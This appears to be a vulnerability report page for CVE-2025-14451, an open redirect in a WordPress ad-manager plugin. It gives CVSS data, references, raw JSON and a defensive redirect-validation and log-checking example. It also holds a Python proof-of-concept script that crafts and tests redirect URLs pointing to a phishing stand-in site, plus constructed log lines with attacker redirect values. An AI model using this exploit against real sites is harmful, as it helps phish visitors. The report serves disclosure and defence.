Security Vulnerability Report
CVE-2025-14451 CVSS 4.7 MEDIUM

CVE-2025-14451

Published: 2025-12-13 16:16:50
Last Modified: 2026-04-15 00:35:42

Description

The Solutions Ad Manager plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.0.0. This is due to insufficient validation on the redirect URL supplied via the 'sam-redirect-to' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action.
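The description names insufficient validation of the redirect URL as the root cause, so the check a fix needs is worth showing concretely. The block below is an added example, not the plugin's code and not from Wordfence: it implements an allow-list validation of a redirect target in Python, beside the prefix check that looks safe but is not, and reuses the same validator as a log check a defender can run over web-server access logs to find requests whose redirect parameter would have left the site. It goes a little beyond the page by also handling the scheme-relative (`//host`), backslash and extra-slash variants of the same bug class. The host name `shop.example`, the allow-list and the log lines are constructed; the `sam-redirect-to` parameter name and the plugin path come from the page.

```python
"""Added example (not the plugin's code): allow-list validation of a
redirect target, plus a log check for requests that would have left the
site. It models the bug class behind CVE-2025-14451 (CWE-601): a value
from a parameter such as 'sam-redirect-to' reaching a Location header
without a host check. Host names and log lines below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit, urlunsplit

# Hosts the application may redirect to (constructed allow-list).
ALLOWED_HOSTS = {"shop.example"}


def weak_redirect_check(target: str) -> bool:
    """A prefix check of the kind that looks safe but is not: it accepts
    'https://shop.example.evil.test/' and the scheme-relative '//evil.test/',
    both of which leave the site."""
    return target.startswith("/") or target.startswith("https://shop.example")


def normalise_redirect_target(target: str):
    """Return a canonical on-site URL, or None if the target leaves the site."""
    # Several browsers treat '\' as '/', so '/\evil.test' must not be
    # mistaken for a site-relative path.
    parts = urlsplit(target.replace("\\", "/"))

    # Only http(s) or no scheme at all; rejects javascript:, data:, etc.
    if parts.scheme and parts.scheme not in ("http", "https"):
        return None

    if parts.netloc:
        # Absolute or scheme-relative URL: exact allow-list match on the
        # parsed host (userinfo and port stripped), never a prefix match.
        host = (parts.hostname or "").lower()
        if host not in ALLOWED_HOSTS:
            return None
        return urlunsplit(("https", host, parts.path or "/", parts.query, parts.fragment))

    # No host: require a site-relative path such as '/account'. A path that
    # still starts with '//' (from input like '////evil.test') would be read
    # by browsers as a host, so it is rejected too.
    if not parts.path.startswith("/") or parts.path.startswith("//"):
        return None
    return urlunsplit(("", "", parts.path, parts.query, parts.fragment))


def safe_redirect_target(target: str, default: str = "/") -> str:
    """Value to put in Location: the validated target, else a local default
    (the same fall-back pattern as WordPress's wp_safe_redirect())."""
    return normalise_redirect_target(target) or default


# Constructed access-log lines (not real traffic) for the log check below.
SAMPLE_LOG = """\
203.0.113.5 - - [13/Dec/2025:16:20:01 +0000] "GET /wp-content/plugins/solutions-ad-manager/public/?sam-redirect-to=%2Faccount HTTP/1.1" 302 0
203.0.113.9 - - [13/Dec/2025:16:20:07 +0000] "GET /wp-content/plugins/solutions-ad-manager/public/?sam-redirect-to=https%3A%2F%2Fevil.test%2Flogin HTTP/1.1" 302 0
203.0.113.9 - - [13/Dec/2025:16:20:09 +0000] "GET /wp-content/plugins/solutions-ad-manager/public/?sam-redirect-to=%2F%2Fevil.test%2F HTTP/1.1" 302 0
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (?P<path>\S+) HTTP/')


def offsite_redirect_requests(log_text: str, param: str = "sam-redirect-to") -> list:
    """Return the log lines whose redirect parameter would have left the site.
    Useful for checking whether the bug was exercised before the plugin was
    updated; the validator above is the single source of truth for 'off-site'."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        query = urlsplit(match.group("path")).query
        values = parse_qs(query).get(param, [])  # parse_qs URL-decodes the values
        if any(normalise_redirect_target(v) is None for v in values):
            hits.append(line)
    return hits


if __name__ == "__main__":
    for probe in ("/account?tab=orders", "//evil.test/", "https://shop.example.evil.test/"):
        print(f"{probe!r}: weak={weak_redirect_check(probe)} safe={safe_redirect_target(probe)!r}")
    for hit in offsite_redirect_requests(SAMPLE_LOG):
        print("off-site redirect request:", hit)
```

The design point is that the decision is made on the parsed host, compared exactly against an allow-list, and that rejected input is replaced by a local default rather than echoed back; a prefix or substring test on the raw string is exactly what `weak_redirect_check` shows failing.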

CVSS Details

CVSS Score
4.7
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Solutions Ad Manager plugin for WordPress <= 1.0.0 (all versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# CVE-2025-14451 PoC - Open Redirect in Solutions Ad Manager WordPress Plugin
# Target: WordPress site with Solutions Ad Manager plugin <= 1.0.0


def exploit_open_redirect(target_url, redirect_target):
    """
    Exploits the open redirect vulnerability in sam-redirect-to parameter

    Args:
        target_url: Base URL of the WordPress site
        redirect_target: Malicious URL to redirect users to
    """
    # Construct malicious URL with sam-redirect-to parameter
    # The vulnerable parameter is 'sam-redirect-to'
    exploit_url = f"{target_url}?sam-redirect-to={redirect_target}"

    print(f"[*] Target: {target_url}")
    print(f"[*] Malicious Redirect Target: {redirect_target}")
    print(f"[*] Exploit URL: {exploit_url}")

    # Send request to trigger redirect
    try:
        response = requests.get(exploit_url, allow_redirects=False)

        # Check for redirect response
        if response.status_code in [301, 302, 303, 307, 308]:
            location = response.headers.get('Location', '')
            print("[+] Open Redirect Confirmed!")
            print(f"[+] Status Code: {response.status_code}")
            print(f"[+] Location Header: {location}")

            # Verify redirect goes to attacker-controlled domain.
            # Only the Location header counts: the target is always part of
            # exploit_url by construction, so checking that would be a no-op.
            if redirect_target in location:
                print("[+] Vulnerability successfully exploited!")
                return True
            print("[-] Redirect did not point at the supplied target")
            return False
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")
        return False


# Example usage
if __name__ == "__main__":
    target = "http://example.com/wp-content/plugins/solutions-ad-manager/public/"
    malicious_url = "https://attacker-controlled-site.com/phishing"
    exploit_open_redirect(target, malicious_url)
```

References

https://plugins.trac.wordpress.org/browser/solutions-ad-manager/tags/1.0.0/public/class-solutions-ad-manager-public.php#L30
https://plugins.trac.wordpress.org/browser/solutions-ad-manager/trunk/public/class-solutions-ad-manager-public.php#L30
https://www.wordfence.com/threat-intel/vulnerabilities/id/696495c5-c8f8-4790-af89-1ee911767b1b?source=cve

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2025-14451",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-13T16:16:50.013",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Solutions Ad Manager plugin for WordPress is vulnerable to Open Redirect in all versions up to, and including, 1.0.0. This is due to insufficient validation on the redirect URL supplied via the 'sam-redirect-to' parameter. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-601"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/solutions-ad-manager/tags/1.0.0/public/class-solutions-ad-manager-public.php#L30",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/solutions-ad-manager/trunk/public/class-solutions-ad-manager-public.php#L30",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/696495c5-c8f8-4790-af89-1ee911767b1b?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}
```